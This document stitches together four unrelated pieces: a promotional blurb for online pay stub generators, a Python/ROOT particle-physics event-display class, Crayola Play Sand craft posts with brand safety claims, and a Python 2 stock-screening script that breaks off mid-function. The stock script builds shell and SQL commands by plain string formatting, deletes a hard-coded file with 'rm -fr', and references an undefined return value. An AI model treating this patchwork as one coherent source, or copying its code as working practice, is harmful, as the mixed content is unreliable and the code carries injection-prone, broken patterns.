All employee information is captured too. Essentially, the application captures and calculates all monthly payments made on a worker’s behalf, including union deductions, insurance dues, and income tax. As a result, an employee has a slip with precise details of what their next end month payment will be like. The Intricacies and Costs of On-Premise Software are Avoided Your small company may leverage conventional payroll app functionalities via various approaches, yet, these may not prove viable. For example, you may buy licensed software which you may be paying for every year, piling more costs on your small budget. Outsourcing payroll services to the cloud is also an added expense. Additionally, the financial muscle to create and maintain software of your own may be lacking. That won’t be an issue for you when you’re utilizing a pay stub creator on the web. All expenditure emanating from producing the pay stubs on websites is small, meaning smaller operating spending for your small business. Quick Access and Generation Nowadays, pay stub creators can deliver the paperwork quickly, and your employees can find them as soon as need be. As such, transparency at the office is enhanced since lack of timely delivery of the docs can instill nervousness and mistrust among employees. Also, if a worker raises a complaint, the stub can be checked without a lot of fuss. More Convenient Than Manual Paperwork If you’re currently using manual calculations, it’s high time you switched to a more convenient approach. A reliable online check stub template gets rid of the cumbersome manual math you’ve been utilizing for your ‘payroll computations.’ The app eliminates errors from pay calculations, and it facilitates any desired tracking of past records. Your small business can benefit immensely from using an online pay stub generator. The generators help reduce operational costs and improve accuracy, access, and timeliness of pay stub production.
|
import ROOT as r
import supy
class displayer(supy.steps.displayer):
def __init__(self,
scale=200.0,
jets=[{"fixes":("J", "Gen"), "nMax":4, "color":r.kBlack, "width":2, "style":2},
{"fixes":("J", ""), "nMax":4, "color":r.kBlue, "width":1, "style":1},
],
nMaxParticles=4,
particles=[("genB", r.kRed, 0.15),
("genTau", r.kCyan, 0.15),
("genMu", r.kMagenta+1, 0.05),
("genEle", r.kOrange, 0.05),
],
nMaxDiTaus=4,
taus={"color":r.kGreen+2, "width":1, "style":1},
):
self.moreName = "(see below)"
for item in ["scale", "jets", "nMaxParticles", "particles", "nMaxDiTaus", "taus"]:
setattr(self, item, eval(item))
self.titleSizeFactor = 1.0
self.legendDict = {}
self.legendList = []
self.ellipse = r.TEllipse()
self.ellipse.SetFillStyle(0)
self.line = r.TLine()
self.arrow = r.TArrow()
self.text = r.TText()
self.latex = r.TLatex()
def prepareText(self, params, coords) :
self.text.SetTextSize(params["size"])
self.text.SetTextFont(params["font"])
self.text.SetTextColor(params["color"])
self.textSlope = params["slope"]
self.textX = coords["x"]
self.textY = coords["y"]
self.textCounter = 0
def printText(self, message, color=r.kBlack):
self.text.SetTextColor(color)
self.text.DrawText(self.textX, self.textY - self.textCounter * self.textSlope, message)
self.textCounter += 1
self.text.SetTextColor(r.kBlack)
def printEvent(self, eventVars, params, coords):
self.prepareText(params, coords)
self.printText("Event %10d" % eventVars["EVENT"])
self.printText("Weight %9.2f" % eventVars["weight"])
self.printText("")
#self.printText("rho %10.1f" % eventVars["rho"])
self.printText("")
#met = eventVars["MissingET"][0]
#self.printText("MET %10.1f (phi %4.1f)" % (met.MET, met.Phi))
self.printText("")
def printJets(self, eventVars=None, params=None, coords=None, fixes=None, nMax=None, highlight=False):
def j(s="", iJet=None):
return eventVars["%s%d%s%s" % (fixes[0], 1+iJet, fixes[1], s)]
self.prepareText(params, coords)
self.printText("".join(fixes))
headers = " csv pT eta phi mass"
self.printText(headers)
self.printText("-" * len(headers))
for iJet in range(nMax):
if nMax <= iJet:
self.printText("[%d more not listed]" % (nJets - nMax))
break
out = ""
out += "%6s %5.0f %5.1f %5.1f %5.0f" % (" " if fixes[1] else "%6.2f" % j("CSVbtag", iJet),
j("Pt", iJet),
j("Eta", iJet),
j("Phi", iJet),
j("Mass", iJet),
)
self.printText(out, r.kBlack)
def printGenParticles(self, eventVars=None, params=None, coords=None,
nMax=None, particles=None, color=r.kBlack):
def g(s="", iJet=None):
return eventVars["%s%s" % (particles, s)].at(iJet)
self.prepareText(params, coords)
self.printText(particles)
headers = " pT eta phi mass"
self.printText(headers)
self.printText("-" * len(headers))
nParticles = eventVars["%sPt" % particles].size()
for iParticle in range(nParticles):
if nMax <= iParticle:
self.printText("[%d more not listed]" % (nParticles - nMax))
break
self.printText("%5.0f %5.1f %5.1f %5.1f" % (g("Pt", iParticle),
g("Eta", iParticle),
g("Phi", iParticle),
g("Mass", iParticle),
),
color=color)
return
def printDiTaus(self, eventVars=None, params=None, coords=None,
nMax=None, color=r.kBlack, ptMin=None):
self.prepareText(params, coords)
self.printText("di-taus")
headers = "cmee pT eta phi mass iso*"
self.printText(headers)
self.printText("-" * len(headers))
nDiTaus = eventVars["pt1"].size()
for iDiTau in range(nDiTaus):
if nMax <= iDiTau:
self.printText("[%d more not listed]" % (nDiTaus - nMax))
break
for iTau in [1, 2]:
c = eventVars["charge%d" % iTau].at(iDiTau)
if c > 0:
s = "+"
elif c < 0:
s = "-"
else:
s = "@"
values = (s,
eventVars["againstMuonLoose%d" % iTau].at(iDiTau),
eventVars["againstElectronLoose%d" % iTau].at(iDiTau),
eventVars["againstElectronLooseMVA3_%d" % iTau].at(iDiTau),
eventVars["pt%d" % iTau].at(iDiTau),
eventVars["eta%d" % iTau].at(iDiTau),
eventVars["phi%d" % iTau].at(iDiTau),
eventVars["m%d" % iTau].at(iDiTau),
eventVars["iso%d" % iTau].at(iDiTau),
)
self.printText("%1s%1d%1d%1d %5.0f %5.1f %5.1f %5.1f %5.1f" % values, color=color)
self.printText(" ")
return
def drawSkeleton(self, coords, color) :
r.gPad.AbsCoordinates(False)
self.ellipse.SetLineColor(color)
self.ellipse.SetLineWidth(1)
self.ellipse.SetLineStyle(1)
self.ellipse.DrawEllipse(coords["x0"], coords["y0"], coords["radius"], coords["radius"], 0.0, 360.0, 0.0, "")
self.line.SetLineColor(color)
self.line.DrawLine(coords["x0"]-coords["radius"], coords["y0"] , coords["x0"]+coords["radius"], coords["y0"] )
self.line.DrawLine(coords["x0"] , coords["y0"]-coords["radius"], coords["x0"] , coords["y0"]+coords["radius"])
def drawScale(self, color, size, scale, point) :
self.latex.SetTextSize(size)
self.latex.SetTextColor(color)
self.latex.DrawLatex(point["x"], point["y"],"radius = "+str(scale)+" GeV p_{T}")
    def drawP4(self,
               rhoPhiPad=None,
               etaPhiPad=None,
               coords=None,
               p4=None,
               lineColor=None,
               lineWidth=1,
               lineStyle=1,
               arrowSize=1.0,
               circleRadius=1.0,
               b=None,
               tau=None):
        """Draw one four-vector: an arrow on the rho-phi pad and a circle at
        (eta, phi) on the eta-phi pad; b/tau flags overlay extra dashed circles."""
        c = coords
        x0 = c["x0"]
        y0 = c["y0"]
        # Arrow tip: px/py scaled so coords["scale"] GeV maps onto the
        # skeleton radius.
        x1 = x0 + p4.px()*c["radius"]/c["scale"]
        y1 = y0 + p4.py()*c["radius"]/c["scale"]
        rhoPhiPad.cd()
        self.arrow.SetLineColor(lineColor)
        self.arrow.SetLineWidth(lineWidth)
        self.arrow.SetLineStyle(lineStyle)
        self.arrow.SetArrowSize(arrowSize)
        self.arrow.SetFillColor(lineColor)
        self.arrow.DrawArrow(x0, y0, x1, y1)
        etaPhiPad.cd()
        self.ellipse.SetLineColor(lineColor)
        self.ellipse.SetLineWidth(lineWidth)
        self.ellipse.SetLineStyle(lineStyle)
        self.ellipse.DrawEllipse(p4.eta(), p4.phi(), circleRadius, circleRadius, 0.0, 360.0, 0.0, "")
        if b:
            # Dotted red overlay for b-tagged objects.  NOTE(review): the
            # shared ellipse's color/style are left modified after this
            # branch; later callers reset them before drawing.
            self.ellipse.SetLineColor(r.kRed)
            self.ellipse.SetLineStyle(3)
            self.ellipse.DrawEllipse(p4.eta(), p4.phi(), circleRadius, circleRadius, 0.0, 360.0, 0.0, "")
        if tau:
            # Dashed cyan overlay for taus.
            self.ellipse.SetLineColor(r.kCyan)
            self.ellipse.SetLineStyle(2)
            self.ellipse.DrawEllipse(p4.eta(), p4.phi(), circleRadius, circleRadius, 0.0, 360.0, 0.0, "")
def legendFunc(self, lineColor=None, lineStyle=1, name="", desc=""):
if name not in self.legendDict:
self.legendDict[name] = True
self.legendList.append((lineColor, lineStyle, desc, "l"))
    def drawGenParticles(self, eventVars=None, indices="",
                         coords=None, lineColor=None,
                         lineWidth=1, lineStyle=1,
                         arrowSize=-1.0, circleRadius=None):
        """Draw the generator-level particles selected by eventVars[indices]."""
        self.legendFunc(lineColor=lineColor,
                        lineStyle=lineStyle,
                        name=indices,
                        desc=indices)
        for iParticle in eventVars[indices]:
            particle = eventVars["genP4"].at(iParticle)
            if circleRadius is None:
                # NOTE(review): drawP4 is called here without
                # rhoPhiPad/etaPhiPad, yet drawP4 dereferences both — this
                # path looks unusable as written; confirm whether this
                # method is still called anywhere.
                self.drawP4(coords=coords,
                            p4=particle,
                            lineColor=lineColor,
                            lineWidth=lineWidth,
                            arrowSize=arrowSize)
            else :
                # NOTE(review): drawCircle is not defined in this class as
                # visible here — presumably inherited from the supy base
                # class; verify.
                self.drawCircle(p4=particle,
                                lineColor=lineColor,
                                lineWidth=lineWidth,
                                circleRadius=circleRadius)
    def drawJets(self, eventVars=None, fixes=None, nMax=None, vec=False, bVar="",
                 coords=None, lineColor=None, lineWidth=1, lineStyle=1,
                 arrowSize=-1.0, circleRadius=None, rhoPhiPad=None, etaPhiPad=None):
        """Draw up to nMax jets on the rho-phi and eta-phi pads.

        fixes: (prefix, suffix) naming the branches, e.g. ("J", "Gen").
        vec: when True, read vector branches "<prefix><var>".at(i); otherwise
        read per-jet scalar branches "<prefix><i+1><suffix><var>".
        """
        def j(s="", iJet=None):
            if vec:
                return eventVars["%s%s" % (fixes[0], s)].at(iJet)
            else:
                return eventVars["%s%d%s%s" % (fixes[0], 1+iJet, fixes[1], s)]
        self.legendFunc(lineColor=lineColor,
                        lineStyle=lineStyle,
                        name="".join(fixes), desc="".join(fixes))
        for iJet in range(nMax):
            if not j("Pt", iJet):
                # skip empty jet slots (pT == 0)
                continue
            self.drawP4(rhoPhiPad=rhoPhiPad,
                        etaPhiPad=etaPhiPad,
                        coords=coords,
                        p4=supy.utils.LorentzV(j("Pt", iJet), j("Eta", iJet), j("Phi", iJet), j("Mass", iJet)),
                        # 0.679: presumably the CSV medium b-tag working
                        # point — confirm against the analysis configuration.
                        b=False if (fixes[1] or not bVar) else (j(bVar, iJet) > 0.679),
                        tau=False,
                        lineColor=lineColor,
                        lineWidth=lineWidth,
                        lineStyle=lineStyle,
                        arrowSize=arrowSize,
                        circleRadius=circleRadius)
def drawTaus(self, eventVars=None,
coords=None, lineColor=None, lineWidth=1, lineStyle=1,
arrowSize=-1.0, circleRadius=None, rhoPhiPad=None, etaPhiPad=None):
self.legendFunc(lineColor=lineColor, lineStyle=lineStyle, name="reco. taus", desc="reco. taus")
nDiTaus = eventVars["pt1"].size()
for iDiTau in range(nDiTaus):
for iTau in [1, 2]:
self.drawP4(rhoPhiPad=rhoPhiPad,
etaPhiPad=etaPhiPad,
coords=coords,
p4=supy.utils.LorentzV(eventVars["pt%d" % iTau].at(iDiTau),
eventVars["eta%d" % iTau].at(iDiTau),
eventVars["phi%d" % iTau].at(iDiTau),
eventVars["m%d" % iTau].at(iDiTau),
),
lineColor=lineColor,
lineWidth=lineWidth,
lineStyle=lineStyle,
arrowSize=arrowSize,
circleRadius=circleRadius)
def etaPhiPad(self, eventVars, corners):
pad = r.TPad("etaPhiPad", "etaPhiPad",
corners["x1"], corners["y1"],
corners["x2"], corners["y2"])
pad.cd()
pad.SetTickx()
pad.SetTicky()
etaPhiPlot = r.TH2D("etaPhi", ";#eta;#phi;",
1, -r.TMath.Pi(), r.TMath.Pi(),
1, -r.TMath.Pi(), r.TMath.Pi())
etaPhiPlot.SetStats(False)
etaPhiPlot.Draw()
return pad, etaPhiPlot
def rhoPhiPad(self, eventVars, coords, corners):
pad = r.TPad("rhoPhiPad", "rhoPhiPad", corners["x1"], corners["y1"], corners["x2"], corners["y2"])
pad.cd()
skeletonColor = r.kYellow+1
self.drawSkeleton(coords, skeletonColor)
self.drawScale(color=skeletonColor, size=0.03, scale=coords["scale"],
point={"x":0.0, "y":coords["radius"]+coords["y0"]+0.03})
return pad
def drawObjects(self, eventVars=None, etaPhiPad=None, rhoPhiPad=None, rhoPhiCoords=None):
"""Draw all object collections (gen particles, jets, taus) on the two pads.

The arrow size is shrunk by 20% after each collection so overlapping
objects from different collections remain distinguishable.
"""
defArrowSize=0.5*self.arrow.GetDefaultArrowSize()
defWidth=1
arrowSize = defArrowSize
# Generator-level particle collections configured on self.particles.
for particles, color, size in self.particles:
self.drawJets(eventVars=eventVars,
fixes=(particles, ""),
vec=True,
nMax=eventVars["%sPt" % particles].size(),
coords=rhoPhiCoords,
lineColor=color,
arrowSize=arrowSize,
circleRadius=size,
rhoPhiPad=rhoPhiPad,
etaPhiPad=etaPhiPad,
)
arrowSize *= 0.8
# Reconstructed jet collections configured on self.jets.
for d in self.jets:
self.drawJets(eventVars=eventVars,
fixes=d["fixes"],
nMax=d["nMax"],
bVar="CSVbtag",
coords=rhoPhiCoords,
lineColor=d["color"],
lineWidth=d["width"],
lineStyle=d["style"],
arrowSize=arrowSize,
circleRadius=0.5,
rhoPhiPad=rhoPhiPad,
etaPhiPad=etaPhiPad,
)
arrowSize *= 0.8
self.drawTaus(eventVars=eventVars,
coords=rhoPhiCoords,
lineColor=self.taus["color"],
lineWidth=self.taus["width"],
lineStyle=self.taus["style"],
arrowSize=arrowSize,
circleRadius=0.25,
rhoPhiPad=rhoPhiPad,
etaPhiPad=etaPhiPad,
)
arrowSize *= 0.8
def drawLegend(self, corners) :
"""Build and draw the legend pad from the entries accumulated in self.legendList.

Returns [pad, legend] so the caller can keep the ROOT objects alive.
"""
pad = r.TPad("legendPad", "legendPad", corners["x1"], corners["y1"], corners["x2"], corners["y2"])
pad.cd()
legend = r.TLegend(0.0, 0.0, 1.0, 1.0)
for color, style, desc, gopts in self.legendList:
self.line.SetLineColor(color)
self.line.SetLineStyle(style)
# Draw a zero-length line purely to obtain a styled object handle
# that TLegend can reference for this entry.
someLine = self.line.DrawLine(0.0, 0.0, 0.0, 0.0)
legend.AddEntry(someLine, desc, gopts)
legend.Draw("same")
self.canvas.cd()
pad.Draw()
return [pad,legend]
def printText1(self, eventVars, corners):
"""Fill the main text pad: event header, jet tables, gen-particle tables, di-taus.

The vertical cursor `y` steps down by `slope` per printed line; each table
is assumed to occupy (5 + nMax) lines.
"""
pad = r.TPad("textPad", "textPad",
corners["x1"], corners["y1"],
corners["x2"], corners["y2"])
pad.cd()
defaults = {}
defaults["size"] = 0.035
defaults["font"] = 80
defaults["color"] = r.kBlack
defaults["slope"] = 0.017
s = defaults["slope"]
smaller = {}
smaller.update(defaults)
smaller["size"] = 0.034
yy = 0.98
x0 = 0.01
self.printEvent(eventVars, params=defaults, coords={"x": x0, "y": yy})
y = yy - 5*s
for d in self.jets:
self.printJets(eventVars,
params=smaller,
coords={"x": x0, "y": y},
fixes=d["fixes"],
nMax=d["nMax"],
highlight=False)
y -= s*(5 + d["nMax"])
# Gen-particle tables are laid out two per row (left/right columns).
for i, (particles, color, size) in enumerate(self.particles):
self.printGenParticles(eventVars,
params=smaller,
particles=particles,
color=color,
coords={"x": x0+(0.5 if i%2 else 0.0), "y": y},
nMax=self.nMaxParticles)
# NOTE(review): y is decremented on both branches below, i.e. after
# every table rather than once per row -- confirm this is intended.
if i % 2:
y -= s*(5 + self.nMaxParticles)
if not (i % 2):
y -= s*(5 + self.nMaxParticles)
self.printDiTaus(eventVars,
params=smaller,
coords={"x": x0, "y": y},
nMax=self.nMaxDiTaus)
y -= s*(5 + self.nMaxDiTaus)
self.canvas.cd()
pad.Draw()
return [pad]
def printText2(self, eventVars, corners):
    """Create and draw the (currently empty) secondary text pad.

    The pad is drawn onto self.canvas and returned in a list so the caller
    can keep a reference to it alive.
    """
    pad = r.TPad("textPad2", "textPad2",
                 corners["x1"], corners["y1"],
                 corners["x2"], corners["y2"])
    pad.cd()
    # NOTE(review): the original body built text-layout defaults (size, font,
    # color, slope) and cursor coordinates but never printed anything; those
    # dead locals were removed.  Re-introduce them when this pad gains content.
    self.canvas.cd()
    pad.Draw()
    return [pad]
def display(self, eventVars):
"""Assemble the full event display: rho-phi pad, eta-phi inset, legend, text.

Returns a list of all created ROOT objects; the caller must hold on to it,
presumably so the objects are not garbage-collected while displayed.
"""
rhoPhiPadYSize = 0.50*self.canvas.GetAspectRatio()
rhoPhiPadXSize = 0.50
radius = 0.4
rhoPhiCoords = {"scale":self.scale, "radius":radius,
"x0":radius, "y0":radius+0.05}
# Pad corner coordinates are fractions of the canvas; the eta-phi inset
# deliberately overlaps the upper-right of the rho-phi pad.
rhoPhiCorners = {"x1":0.0,
"y1":0.0,
"x2":rhoPhiPadXSize,
"y2":rhoPhiPadYSize}
etaPhiCorners = {"x1":rhoPhiPadXSize - 0.18,
"y1":rhoPhiPadYSize - 0.08*self.canvas.GetAspectRatio(),
"x2":rhoPhiPadXSize + 0.12,
"y2":rhoPhiPadYSize + 0.22*self.canvas.GetAspectRatio()}
legendCorners = {"x1":0.0,
"y1":rhoPhiPadYSize,
"x2":1.0-rhoPhiPadYSize,
"y2":1.0}
textCorners1 = {"x1":rhoPhiPadXSize + 0.11,
"y1":0.0,
"x2":1.0,
"y2":1.0}
textCorners2 = {"x1":rhoPhiPadXSize - 0.08,
"y1":0.0,
"x2":rhoPhiPadXSize + 0.11,
"y2":0.55}
rhoPhiPad = self.rhoPhiPad(eventVars, rhoPhiCoords, rhoPhiCorners)
etaPhiPad, etaPhiPlot = self.etaPhiPad(eventVars, etaPhiCorners)
keep = [rhoPhiPad, etaPhiPad, etaPhiPlot]
# Draw the physics objects first, then re-draw the pads on the canvas.
self.drawObjects(eventVars, etaPhiPad, rhoPhiPad, rhoPhiCoords)
self.canvas.cd()
rhoPhiPad.Draw()
etaPhiPad.Draw()
keep.append(self.drawLegend(corners=legendCorners))
keep.append(self.printText1(eventVars, corners=textCorners1))
#keep.append(self.printText2(eventVars, corners=textCorners2))
return keep
|
Back 2 School! Head back with a Sparkly Tumbler filled with Crayola Play Sand!
Yes, yes, we know! The time has come already! It's already time to go back to school! Seems like the Summer break just started right?! Send your kiddos back to school in style with their very own custom sparkly tumbler made with Crayola Play Sand! Your kids will love staying hydrated with their colorful tumbler filled with sparkling glitter. The glitter floats around even more when shaken. This adds an amazing effect for kids that need a little sensory interaction while sitting at their desks for long periods of time.
Keep reading to learn how to make one of your own!
Optional: plastic school related inserts (found in scrapbooking at the craft store).
2. Once the sand is filled up 1/2 to 2/3rds of the way, add glitter to your liking for a little extra sparkle! Next, add water to fill up the remaining space until there's only 1-1.5 inches of unfilled space left in the tumbler.
3. Next, it's time to glue the bottom lid back down. Grab your E6000 glue, and with a cotton swab, smear a safe amount of glue along the entire inner rim of the tumbler lid. For added sealing, you can also add some glue around the bottom rim of the tumbler as well. Next, quickly screw the lid back on. Make sure it is screwed as tightly and evenly as possible to avoid any chances of water leaking. Allow to dry overnight before using.
4. Shake! Shake! Shake! Enjoy watching the sand and glitter mix and float all around. Your kid is going to love it!
5. Optional: DRY version of this tumbler using plastic school-related inserts (found in the scrapbooking section of your craft store). This looks pretty messy, but some kids enjoy shaking the tumbler to reveal the pencils and journals buried in the sand! (We do not recommend adding water or liquids if you go this route).
And you're all done! Here's to a bright and colorful school year for the kids in your life!
Make 4th of July Confetti Blasters with Crayola Play Sand!
Independence Day is right around the corner and we've got a fun, colorful and low cost way to celebrate! These blasters make for a wonderful alternative when fireworks in neighborhoods aren't permitted. They are also kid safe, (just be sure to not aim at anyone's face!).
See it in action below and keep reading to learn how to make some of your own!
1. Measure and cut your scrapbook paper to the length of the toilet paper tube. Next, secure the paper to the tube with regular tape as pictured and roll it up until the tube is completely covered. Secure it with more regular tape.
2. Next, cover the clear tape with washi tape. Secure the washi by folding it over on the top and bottom of the tube.
3. Grab a balloon, tie the tail end in a knot and cut the top (round part) off with scissors. 1/3 of the way will do!
4. Affix the tail-end of your balloon around the top of the decorated tube and secure the perimeter with washi tape.
All done with the tubes! Now on to the sand + confetti mix!
6. Add confetti of your choice...in the amount to your liking. We chose big sparkly stars!
7. Stir up the mix with a spoon until the confetti is spread evenly among the play sand.
8. Spoon in about 2 spoonfuls (2 tbs) of confetti sand mix into each tube.
And you're done! Go outside and blast off! Happy Independence Day!
Prehistoric Safari Sandbox, a place where imagination meets adventure.
How about creating an interactive sandbox game as part of a sand arts and craft activity?
don’t forget the safari hats for your kiddos.
Jump into Summer Colorfully & Safely!
Finally, the summer is here and we all know it’s time to open the doors and let the kids run riot outdoors. Bright, colorful, safe Crayola Play Sand lets children take their creative experiences outdoors. But how safe is Crayola Play Sand? Crayola brand has been a well-trusted brand for many years and all our play sand products are independently tested at Duke University & BioScience Laboratories. Unlike beach sand, the smooth grains are thoroughly washed and dried to remove all contaminants and dirt. And be assured that absolutely no chemicals were used in washing our sand, only water!!! To further ensure you that our Play Sand is safe, each grain is dried by heating them to 250°F which destroys any possible fungal or bio-material.
Let your summer be colorful and most importantly safe!
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__version__ = 0.1
from lib import stock
from lib.htmltmpl import TemplateManager, TemplateProcessor
import sys
import os
import shutil
import pickle
import re
import time
#import pysqlite2.dbapi2 as sqlite
import sqlite3 as sqlite
import getopt
from operator import itemgetter
from decimal import *
import urllib
import json
import fpformat
import subprocess
import datetime
import string
import pprint
import commands
import smtplib
from pprint import pprint
"""
股票均线相对大盘均线的涨幅比较
针对大盘指数涨跌幅对比
"""
import threading,Queue
class ind_runs(threading.Thread):
"""Worker thread: pulls symbols from the module-global `clientpool` queue and
classifies each as stronger (long_result) or weaker (short_result) than the
base index's percent change."""
def __init__(self,base,long_result,short_result,day_ago,sma_day,timeframe='day'):
threading.Thread.__init__(self)
# Results are appended to the shared lists passed in by the caller.
self.long_result=long_result
self.short_result=short_result
self.base=base
self.day_ago= day_ago
self.sma_day=sma_day
self.timeframe = timeframe # week,day,month
def run(self):
"""
Relative strength = (stock's percent change - index's percent change) * 100
"""
while clientpool.empty() != True:
try:
symbol = clientpool.get(block=0)
change = get_indicator_output(symbol,self.day_ago,self.sma_day,self.timeframe)
# NOTE(review): a symbol whose change equals self.base is appended
# to BOTH result lists -- confirm that this is intended.
if change >= self.base:
tmp_str = "%s,%s" % (symbol,change)
data = tuple(tmp_str.split(","))
self.long_result.append(data)
if change <= self.base:
tmp_str = "%s,%s" % (symbol,change)
data = tuple(tmp_str.split(","))
self.short_result.append(data)
except Queue.Empty:
pass
class graph_runs(threading.Thread):
"""Worker thread: renders day/week/month chart images via graphic.pl for each
symbol pulled from the module-global `clientpool` queue, appending a dict of
image paths to the shared result list."""
def __init__(self,result,endday,conf_dir):
threading.Thread.__init__(self)
self.result=result
self.endday = endday
self.conf_dir = conf_dir
def run(self):
while clientpool.empty() != True:
try:
symbol = clientpool.get(block=0)
out_dir = img_out_dir
conf_dir = self.conf_dir
graph_conf = "%s/graph_day.conf" % (conf_dir)
graph_week_conf = "%s/graph_week.conf" % (conf_dir)
graph_month_conf = "%s/graph_month.conf" % (conf_dir)
img_file = "%s/%s.png" % (out_dir,symbol)
img_week_file = "%s/%s_WEEK.png" % (out_dir,symbol)
img_month_file = "%s/%s_MONTH.png" % (out_dir,symbol)
os.chdir('%s' % script_dir)
# The day chart honours --end; week/month charts always run to today.
cmd = "perl graphic.pl --end '%s' --file %s --out '%s' %s" % (self.endday,graph_conf,img_file,symbol)
(status,output) = commands.getstatusoutput(cmd)
if status != 0 :
print "Error = %s" % output
continue
cmd = "perl graphic.pl --file %s --out '%s' %s" % (graph_week_conf,img_week_file,symbol)
(status,output) = commands.getstatusoutput(cmd)
if status != 0:
print "Error = %s" % output
continue
cmd = "perl graphic.pl --file %s --out '%s' %s" % (graph_month_conf,img_month_file,symbol)
(status,output) = commands.getstatusoutput(cmd)
if status != 0:
print "Error = %s" % output
continue
stock_dict= {}
stock_dict['symbol'] = symbol
stock_dict['img'] = img_file
stock_dict['img_week'] = img_week_file
stock_dict['img_month'] = img_month_file
self.result.append(stock_dict)
except Queue.Empty:
pass
def get_home_path():
    """Return the user's home directory.

    Uses $HOME when it is set (POSIX); otherwise falls back to concatenating
    %HOMEDRIVE% and %HOMEPATH% (Windows).
    """
    posix_home = os.environ.get('HOME')
    if posix_home:
        return posix_home
    # Windows fallback: join the drive and path environment variables.
    return "%s%s" % (os.environ.get('HOMEDRIVE'), os.environ.get('HOMEPATH'))
def connect_db(db_file):
    """Open (creating on first use) the stock-list SQLite database.

    The `stock` table is created only when the database file does not exist
    yet; both branches of the original duplicated the connect/cursor code.

    Returns:
        (cursor, connection) tuple.
    """
    is_new = not os.path.isfile(db_file)
    cx = sqlite.connect(db_file)
    cu = cx.cursor()
    if is_new:
        cu.execute('''
        create table stock(
        id integer primary key,
        exchange_name varchar(20),
        stock_title varchar(50),
        stock_symbol varchar(20) UNIQUE,
        stock_country varchar(100),
        stock_tradedb_lastupdate_time NUMERIC DEFAULT 0
        )''')
    return (cu,cx)
def connect_pool_db(db_file):
    """Open (creating on first use) the filtered stock-pool SQLite database.

    The `stock` table is created only when the database file does not exist
    yet; both branches of the original duplicated the connect/cursor code.

    Returns:
        (cursor, connection) tuple.
    """
    is_new = not os.path.isfile(db_file)
    cx = sqlite.connect(db_file)
    cu = cx.cursor()
    if is_new:
        cu.execute('''
        create table stock(
        id integer primary key,
        symbol varchar(20) UNIQUE,
        country varchar(100),
        firstsee_time NUMERIC DEFAULT 0,
        lastupdate_time NUMERIC DEFAULT 0
        )''')
    return (cu,cx)
def calc_stock(stock_list,country,timeframe='day'):
"""
计算rps
"""
graph_dir = script_dir
long_data = []
short_data = []
if len(stock_list) == 0 : return result_data
# 标普500指数作为基准
index_name = base_index[country][0]
index_symbol = base_index[country][1]
#day_ago = 30
#sma_day = 120
base_line_percent = get_indicator_output(index_symbol,day_ago,sma_day,timeframe)
if DEBUG: print "day_ago = %s , sma_day = %s ,timeframe=%s , base_line =%s " % (day_ago,sma_day,timeframe,base_line_percent)
#stock_list.append(index_symbol)
quene_list = []
ts = []
# 多线程运行
global clientpool
clientpool = Queue.Queue(0)
for a in stock_list:
a=a.strip()
clientpool.put(a)
for b in xrange(20):
t = ind_runs(base_line_percent,long_data,short_data,day_ago,sma_day,timeframe)
t.start()
ts.append(t)
for t in ts:
if t:t.join()
return (long_data,short_data)
def create_graph(stock_list,template_file,conf_dir,stock_region='US',signal_file="signal_file",endday='today'):
"""
Generate chart images for each symbol (via graph_runs worker threads) and
write an HTML index page listing the day/week/month images per symbol.
"""
out_dir = img_out_dir
graph_conf = "%s/graph_day.conf" % (conf_dir)
template_graph_conf = "/tmp/graph_%s.conf" % (signal_file)
graph_week_conf = "%s/graph_week.conf" % (conf_dir)
graph_month_conf = "%s/graph_month.conf" % (conf_dir)
stock_count = len(stock_list)
template = TemplateManager().prepare(template_file)
tproc = TemplateProcessor(html_escape=0)
# Build the per-symbol image path records consumed by the HTML template.
stock = []
for symbol in stock_list:
img_file = "%s/%s.png" % (out_dir,symbol)
img_week_file = "%s/%s_WEEK.png" % (out_dir,symbol)
img_month_file = "%s/%s_MONTH.png" % (out_dir,symbol)
stock_dict= {}
stock_dict['symbol'] = symbol
stock_dict['img'] = img_file
stock_dict['img_week'] = img_week_file
stock_dict['img_month'] = img_month_file
stock.append(stock_dict)
#pprint.pprint(stock)
tproc.set("market_name","%s Market" % stock_region)
tproc.set("stock_count",stock_count)
tproc.set("Stock",stock)
# save to file
filename = "%s/%s_%s_STOCK.html" % (out_dir,stock_region,signal_file)
FILE = open(filename,"w")
FILE.writelines(tproc.process(template))
FILE.close()
# Render the images with 20 worker threads fed by the shared queue.
global clientpool
#globals()['clentpool'] = Queue.Queue(0)
clientpool = Queue.Queue(0)
ts = []
for a in stock_list:
a=a.strip()
clientpool.put(a)
for b in xrange(20):
t = graph_runs(stock,endday,conf_dir)
t.start()
ts.append(t)
for t in ts:
if t:t.join()
def export_stock_symbol(db_cursor,cx):
"""
Export the symbol-to-title mapping to GeniusTrader's `sharenames` file,
one "symbol TAB title" line per stock ("No title" when the title is empty).
"""
sql = "select * from stock order by stock_symbol"
#print "DEBUG sql = %s" % sql
db_cursor.execute(sql)
rs = db_cursor.fetchall()
# print title
if len(rs) == 0 : return
# NOTE(review): destination path is hard-coded to one user's home directory.
sharenames = "/home/hua.fu/.gt/sharenames"
os.system("rm -fr %s" % sharenames)
share_FILE = open(sharenames,"w")
for item in rs:
# Row layout follows the `stock` table: [2]=title, [3]=symbol, [4]=country.
title = item[2]
symbol = item[3]
country = item[4]
if title:
stock_map = symbol + "\t" + title
share_FILE.writelines(stock_map + "\n")
else:
stock_map = symbol + "\t" + "No title"
share_FILE.writelines(stock_map + "\n")
share_FILE.close()
def get_stock_list(db_cursor,cx,stock_region='US'):
    """Return symbols for `stock_region` whose trade DB timestamp is not in the future.

    Bug fix: the original returned None when no rows matched, which crashed
    callers that immediately take len() of the result; an empty list is
    returned instead (falsy, so truthiness checks behave the same).
    """
    time_now = int(time.time())
    sql = "select * from stock where stock_tradedb_lastupdate_time <= %s and stock_country = '%s' order by stock_symbol" % (time_now,stock_region)
    #sql = "select * from stock where stock_tradedb_lastupdate_time <= %s and stock_country = '%s' ORDER BY RANDOM() limit 10" % (time_now,stock_region)
    db_cursor.execute(sql)
    rs = db_cursor.fetchall()
    stock_list = []
    for item in rs:
        # Column 3 is stock_symbol (see the `stock` table schema).
        symbol = item[3]
        stock_list.append(symbol)
    return stock_list
def connect_trade_db(symbol):
"""
Open the per-symbol historical trade SQLite database under base_dir/trade_db.
Returns (cursor, connection), or (False, False) when the file is missing or
empty -- callers must check for that sentinel.
"""
cache_dir = "%s/trade_db" % (base_dir)
symbol = symbol.upper()
db_file = "%s/%s" % (cache_dir,symbol)
if os.path.isfile(db_file) and os.path.getsize(db_file) != 0:
cx = sqlite.connect(db_file)
cu = cx.cursor()
cx.text_factory=str
return (cu,cx)
